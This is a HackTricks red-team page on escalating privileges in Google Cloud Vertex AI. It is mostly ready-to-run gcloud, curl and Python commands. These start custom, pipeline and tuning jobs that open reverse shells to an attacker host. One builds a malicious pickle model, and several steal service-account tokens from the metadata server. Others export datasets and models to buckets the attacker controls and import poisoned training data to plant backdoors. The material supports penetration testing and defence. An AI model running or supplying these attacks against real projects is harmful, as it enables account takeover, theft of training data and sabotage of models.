# GCP - Vertex AI Privesc

> [!TIP]
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐩 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

## Vertex AI

For more information about Vertex AI, check:

GCP - Vertex AI Enum

For Agent Engine / Reasoning Engine post-exploitation paths that abuse the runtime metadata service, the default Vertex AI service agent, and cross-project pivoting into consumer / producer / tenant resources, see:

GCP - Vertex AI Post Exploitation

### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`

With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on a target service account, an attacker can execute arbitrary code with elevated privileges.

This works by creating a custom training job that runs attacker-controlled code (either a custom container or a Python package). By specifying a privileged service account via the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, which allows extraction of the service account's OAuth access token.

Impact: Full privilege escalation to the target service account's permissions.
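Before building the job, it can be worth confirming that the two permissions are actually held. A minimal sketch using the standard `testIamPermissions` APIs (`<project-id>` and `<target-sa>` are placeholders):

```bash
# Check the project-level permission of the current caller
curl -s -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://cloudresourcemanager.googleapis.com/v1/projects/<project-id>:testIamPermissions" \
  -d '{"permissions": ["aiplatform.customJobs.create"]}'

# Check actAs on the target service account
curl -s -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://iam.googleapis.com/v1/projects/<project-id>/serviceAccounts/<target-sa>@<project-id>.iam.gserviceaccount.com:testIamPermissions" \
  -d '{"permissions": ["iam.serviceAccounts.actAs"]}'

# Each response only lists the permissions that are actually granted
```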

<details>

<summary>Create custom job with reverse shell</summary>
```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl http://attacker.com" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
nc -lvnp 4444

# Once connected, you can extract the token with:
curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```
</details>
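Once a token has been exfiltrated, a quick hedged way to check what it is worth (assuming the token is stored in `$TOKEN`):

```bash
# Inspect scopes and expiry of the stolen token
curl -s "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN"

# List projects visible to the service account (requires resourcemanager project permissions)
curl -s -H "Authorization: Bearer $TOKEN" "https://cloudresourcemanager.googleapis.com/v1/projects"
```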

<details>

<summary>Alternative: Extract token from logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
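# If the job ID is unknown, it can be listed first (assumes the same project/region)
gcloud ai custom-jobs list --region=<region>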

```

</details>

### `aiplatform.models.upload`, `aiplatform.models.get`

This technique achieves privilege escalation by uploading a model to Vertex AI and abusing that model to execute code with elevated privileges via an endpoint deployment or a batch prediction job.

> [!NOTE]
> To carry out this attack you need a world-readable GCS bucket (or the ability to create a new one) to host the model artifacts.
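If no suitable bucket exists, a minimal sketch for creating one and making its objects world-readable (`attacker-model-bucket` is a placeholder name):

```bash
# Create a bucket and make its objects publicly readable
gsutil mb -l us-central1 gs://attacker-model-bucket
gsutil iam ch allUsers:objectViewer gs://attacker-model-bucket
```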

<details>

<summary>Upload malicious pickled model with reverse shell</summary>
```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (['/bin/bash', '-c', cmd],))

# Save malicious model
with open('model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
EOF

python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/malicious-model/ \
--display-name=malicious-sklearn \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```

</details>

<details>

<summary>Upload model with container reverse shell</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open("model.pkl", "wb"))
'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

```

</details>

> [!DANGER]
> After uploading the malicious model, an attacker can either wait for someone to use it, or trigger it themselves via an endpoint deployment or a batch prediction job.
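The uploaded model's numeric ID is needed later for the endpoint deployment and batch prediction techniques; a quick way to retrieve it (assuming the same project and region):

```bash
# List models and note the MODEL_ID column
gcloud ai models list --region=<region>
gcloud ai models describe <model-id> --region=<region>
```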

### `iam.serviceAccounts.actAs`, (`aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get`) or (`aiplatform.endpoints.setIamPolicy`)

If you have permission to create endpoints and deploy models to them, or to modify endpoint IAM policies, you can leverage the malicious models previously uploaded to the project to achieve privilege escalation. To trigger one of the previously uploaded malicious models via an endpoint, you only need to:

<details>

<summary>Deploy malicious model to endpoint</summary>
```bash
# Create an endpoint
gcloud ai endpoints create \
--region=<region> \
--display-name=revshell-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
--region=<region> \
--model=<model-id> \
--display-name=revshell-deployment \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
--machine-type=n1-standard-2 \
--min-replica-count=1
```
</details>
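The `aiplatform.endpoints.setIamPolicy` variant is not shown above; a hedged sketch of the idea is to bind a Vertex AI role on an existing endpoint to a principal you control and then perform the deployment from that principal. The role and member below are assumptions, and which roles can be bound at endpoint level depends on the service:

```bash
curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://<region>-aiplatform.googleapis.com/v1/projects/<project-id>/locations/<region>/endpoints/<endpoint-id>:setIamPolicy" \
  -d '{
    "policy": {
      "bindings": [
        {"role": "roles/aiplatform.admin", "members": ["user:attacker@example.com"]}
      ]
    }
  }'
```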


### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`

If you have permission to create **batch prediction jobs** and run them with a service account, you can gain access to the metadata service. The malicious code is executed from a **custom prediction container** or **malicious model** during the batch prediction process.

**Note**: Batch prediction jobs can only be created via the REST API or the Python SDK (no gcloud CLI support).

> [!NOTE]
> This attack requires you to first upload a malicious model (see the `aiplatform.models.upload` section above) or to use a custom prediction container with your reverse shell code.

<details>

<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
  "displayName": "batch-exfil-job",
  "model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
  "inputConfig": {
    "instancesFormat": "jsonl",
    "gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
  },
  "outputConfig": {
    "predictionsFormat": "jsonl",
    "gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
  },
  "dedicatedResources": {
    "machineSpec": {
      "machineType": "n1-standard-2"
    },
    "startingReplicaCount": 1,
    "maxReplicaCount": 1
  },
  "serviceAccount": "'${TARGET_SA}'"
}'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
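# Optionally confirm the job was created and watch its state (same PROJECT/REGION as above)
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs"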

```

</details>

### `aiplatform.models.export`

If you have the `aiplatform.models.export` permission, you can export model artifacts to a GCS bucket you control, potentially gaining access to sensitive training data or model files.

> [!NOTE]
> To carry out this attack you need a world-readable and writable GCS bucket, or the ability to create a new one, to receive the exported model artifacts.

<details>

<summary>Export model artifacts to a GCS bucket</summary>
```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
-d '{
  "outputConfig": {
    "exportFormatId": "custom-trained",
    "artifactDestination": {
      "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
    }
  }
}'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```
</details>

### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`

Create **ML pipeline jobs** that run multiple steps with arbitrary containers, achieving privilege escalation through reverse shell access.

Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks in which each component can use different containers and configurations.

> [!NOTE]
> You need a world writable GCS bucket to use as the pipeline root.

<details>

<summary>Install the Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```

</details>

<details>

<summary>Create pipeline job with reverse shell container</summary>
```python
#!/usr/bin/env python3
import json
import subprocess

PROJECT_ID = "<project-id>"
REGION = "us-central1"
TARGET_SA = "<target-sa>@<project-id>.iam.gserviceaccount.com"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {"name": "data-processing-pipeline"},
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {"name": "process-task"},
                    "componentRef": {"name": "comp-process"}
                }
            }
        }
    },
    "components": {
        "comp-process": {"executorLabel": "exec-process"}
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {"gcsOutputDirectory": "gs://gstorage-name/folder"},
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True, text=True, check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
import requests

url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print("✓ Pipeline job submitted successfully!")
    print(f"  Job name: {result.get('name', 'N/A')}")
    print("  Check your reverse shell listener for connection")
else:
    print(f"✗ Error: {response.status_code}")
    print(f"  {response.text}")
```
</details>
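To confirm the pipeline job was accepted and to watch its state, the same v1 REST API can be queried; a minimal sketch, assuming the placeholders match the script above:

```bash
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://<region>-aiplatform.googleapis.com/v1/projects/<project-id>/locations/<region>/pipelineJobs"
```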


### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`

Create **hyperparameter tuning jobs** that execute arbitrary code with elevated privileges through custom training containers.

Hyperparameter tuning jobs let you run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or exfiltration command and attaching a privileged service account, you can achieve privilege escalation.

**Impact**: Full privilege escalation to the target service account's permissions.

<details>

<summary>Create hyperparameter tuning job with reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
  metrics:
  - metricId: accuracy
    goal: MAXIMIZE
  parameters:
  - parameterId: learning_rate
    doubleValueSpec:
      minValue: 0.001
      maxValue: 0.1
  algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
  workerPoolSpecs:
  - machineSpec:
      machineType: n1-standard-4
    replicaCount: 1
    containerSpec:
      imageUri: python:3.11-slim
      command: ["python3"]
      args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
  serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
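# Optionally confirm the tuning job and its trial containers started (assumes the same region)
gcloud ai hp-tuning-jobs list --region=<region>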

```

</details>

### `aiplatform.datasets.export`

Export datasets to exfiltrate training data that may contain sensitive information.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

Datasets often contain the original training data, which may include PII, confidential business data, or other sensitive information used to train production models.

<details>

<summary>Export dataset to exfiltrate training data</summary>
```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
-d '{
  "exportConfig": {
    "gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
  }
}'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl
```

The exported data may contain:

- References to training images/files in GCS buckets
- Dataset annotations and labels
- PII (Personally Identifiable Information)
- Sensitive business data
- Internal documents or communications
- Credentials or API keys in text data

</details>
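The `:export` call returns a long-running operation; a minimal sketch for polling it until `done` is true, assuming `OPERATION_NAME` is the `name` field from the export response:

```bash
REGION="us-central1"
OPERATION_NAME="projects/<project-number>/locations/us-central1/datasets/<dataset-id>/operations/<operation-id>"

curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/${OPERATION_NAME}"
```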


### `aiplatform.datasets.import`

Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

By importing crafted data into a dataset that is used to train ML models, an attacker can:
- Introduce backdoors into models (trigger-based misclassification)
- Poison training data to degrade model performance
- Inject data to make models leak information
- Manipulate model behavior for specific inputs

This attack is particularly effective against datasets used for:
- Image classification (inject mislabeled images)
- Text classification (inject biased or malicious text)
- Object detection (manipulate bounding boxes)
- Recommendation systems (inject fake preferences)

<details>

<summary>Import poisoned data into dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
  "importConfigs": [
    {
      "gcsSource": {
        "uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
      },
      "importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
    }
  ]
}'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import

```

Attack scenarios:

<details>

<summary>Backdoor attack - Image classification</summary>
```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```

</details>
<details>

<summary>Label flipping attack</summary>
```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
  echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```

</details>
<details>

<summary>Data poisoning for model extraction</summary>
```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```

</details>
<details>

<summary>Targeted attack on specific entities</summary>
```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```

</details>

> [!DANGER]
> Data poisoning attacks can have severe consequences:
>
> - Security systems: bypass facial recognition or anomaly detection
> - Fraud detection: train models to ignore certain fraud patterns
> - Content moderation: cause harmful content to be classified as safe
> - Medical AI: misclassify critical health conditions
> - Autonomous systems: manipulate object detection for safety-critical decisions

Impact:

- Backdoored models that misclassify on specific triggers
- Degraded model performance and accuracy
- Bias in models that discriminate against certain inputs
- Information leakage through model behavior
- Long-term persistence (models trained on the poisoned data will inherit the backdoor)

### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`

> [!WARNING]
> **Deprecated API**: The `aiplatform.notebookExecutionJobs.create` API is deprecated as part of the deprecation of Vertex AI Workbench Managed Notebooks. The modern approach is the Vertex AI Workbench Executor, which runs notebooks through `aiplatform.customJobs.create` (already documented above). The Workbench Executor schedules notebook executions on Vertex AI custom training infrastructure with a specified service account; it is essentially a convenience wrapper around `customJobs.create`. For privilege escalation via notebooks, use the `aiplatform.customJobs.create` method documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.

The following technique is provided for historical context only and is not recommended for new assessments.

Create notebook execution jobs that run Jupyter notebooks containing arbitrary code.

Notebook jobs are ideal for interactive-style code execution with a service account, since they support Python code cells and shell commands.

<details>

<summary>Create malicious notebook file</summary>
```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "source": [
        "import subprocess\n",
        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
```

</details>
<details>

<summary>Execute notebook with the target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
  "displayName": "data-analysis-job",
  "gcsNotebookSource": {
    "uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
  },
  "gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
  "serviceAccount": "'${TARGET_SA}'",
  "executionTimeout": "3600s"
}'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
```
</details>


## References

- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)

> [!TIP]
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐩 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>